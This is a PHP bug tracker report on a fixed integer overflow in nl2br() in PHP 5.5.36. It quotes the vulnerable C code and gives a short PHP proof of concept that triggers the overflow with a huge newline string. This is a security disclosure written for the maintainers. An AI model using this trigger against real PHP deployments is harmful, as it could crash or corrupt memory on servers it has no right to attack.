PHP :: Sec Bug #72268 :: Integer Overflow in nl2br()
| Sec Bug #72268 | Integer Overflow in nl2br() | ||||
|---|---|---|---|---|---|
| Submitted: | 2016-05-26 15:53 UTC | Modified: | 2016-07-07 09:34 UTC | ||
| From: | taoguangchen at icloud dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | *General Issues | ||
| PHP Version: | 5.5.36 | OS: | |||
| Private report: | No | CVE-ID: | None | ||
[2016-05-26 15:53 UTC] taoguangchen at icloud dot com
Description:
------------
```
PHP_FUNCTION(nl2br)
{
/* in brief this inserts <br /> or <br> before matched regexp \n\r?|\r\n? */
char *tmp, *str;
int new_length;
char *end, *target;
int repl_cnt = 0;
int str_len;
zend_bool is_xhtml = 1;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|b", &str, &str_len, &is_xhtml) == FAILURE) {
return;
}
...
{
size_t repl_len = is_xhtml ? (sizeof("<br />") - 1) : (sizeof("<br>") - 1);
new_length = str_len + repl_cnt * repl_len; // ==> integer overflow
...
RETURN_STRINGL(tmp, new_length, 0);
```
PoC:
```
<?php
ini_set('memory_limit', -1);
$str = nl2br(str_repeat("\n", 0xffffffff/14+1));
var_dump(strlen($str));
?>
Fix:
checking new_length
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2016-06-16 04:53 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-06-21 06:53 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-06-21 06:53 UTC] stas@php.net
[2016-07-06 16:03 UTC] php-e1b at deemzed dot uk
[2016-07-06 16:03 UTC] php-e1b at deemzed dot uk
[2016-07-07 09:34 UTC] ab@php.net